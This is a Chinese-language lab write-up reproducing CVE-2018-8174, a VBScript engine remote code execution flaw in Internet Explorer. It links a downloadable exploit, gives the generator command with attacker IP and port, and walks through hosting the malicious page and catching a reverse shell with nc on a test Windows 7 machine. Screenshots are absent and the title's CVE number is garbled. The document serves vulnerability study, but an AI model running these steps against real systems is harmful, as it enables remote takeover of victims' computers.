【漏洞复现】IE 浏览器远程代码执行漏洞(CVE--8174)

时间:2024-04-09 17:31:18

 

一、CVE-2018-8174(本质是 Windows VBScript Engine 代码执行漏洞)

由于 VBScript 脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的 VBScript 嵌入到 Office 文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码,该漏洞影响最新版本的IE浏览器及使用了 IE 内核的应用程序。用户在浏览网页或打开 Office 文档时都可能中招,最终被黑客植入后门木马完全控制电脑。在基于 Web 的攻击情形中,攻击者能通过 Internet Explorer 利用此漏洞的特定网站,然后诱使用户查看该网站。攻击者还可以在承载 IE 呈现引擎的应用程序或 Microsoft Office 文档中嵌入标记为“安全初始化”的 ActiveX 控件。攻击者还可以利用受到破坏的网站和接受或托管用户提供的内容或广告的网站。这些网站可能包含可能利用此漏洞的特制内容。该漏洞影响最新版本的IE浏览器及使用了 IE 内核的应用程序。用户在浏览网页或打开 Office 文档时都可能中招,最终被黑客植入后门木马完全控制电脑。

影响范围:

Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers

 

二、准备

攻击机:kali-2019    192.168.75.134

靶机:win7_x86(关闭防火墙)    192.168.75.130

exp 链接: https://pan.baidu.com/s/1se1UyXIgkI2y7lgEvINTBw 提取码: s8bk

 

三、复现

1、下载 exp

【漏洞复现】IE 浏览器远程代码执行漏洞(CVE-2018-8174)

2、执行 python 脚本,参数格式 “python CVE-2018-8174.py -u http://攻击机IP/payload.html -o payload.rtf -i 攻击机IP -p 指定端口” ,执行完毕后会生成 exploit.html 和 payload.rtf 两个文件,然后将 exploit.html 拷贝到 NGINX 网站目录下,kali 默认安装了 Apache 和 NGINX 

【漏洞复现】IE 浏览器远程代码执行漏洞(CVE-2018-8174)

3、由于 kali 默认安装了 Apache 和 NGINX,因此先关闭 Apache ,然后重启 NGINX 

【漏洞复现】IE 浏览器远程代码执行漏洞(CVE-2018-8174)

4、现在可以启动工具 nc 来监听刚刚设置好的端口 5656,等待对方打开网站

【漏洞复现】IE 浏览器远程代码执行漏洞(CVE-2018-8174)

5、现在用靶机访问刚才生成的网页 http://192.168.75.134/exploit.html ,页面提示错误,但是攻击已经成功

【漏洞复现】IE 浏览器远程代码执行漏洞(CVE-2018-8174)

6、回到攻击机,可以看到已经 getshell,靶机关闭浏览器也不影响

【漏洞复现】IE 浏览器远程代码执行漏洞(CVE-2018-8174)

【漏洞复现】IE 浏览器远程代码执行漏洞(CVE-2018-8174)

 

 

 

 

参考:

https://www.jianshu.com/p/8ca521439792

https://blog.csdn.net/qq_39627497/article/details/84846948

https://www.cnblogs.com/tsimfeiwan/p/11990565.html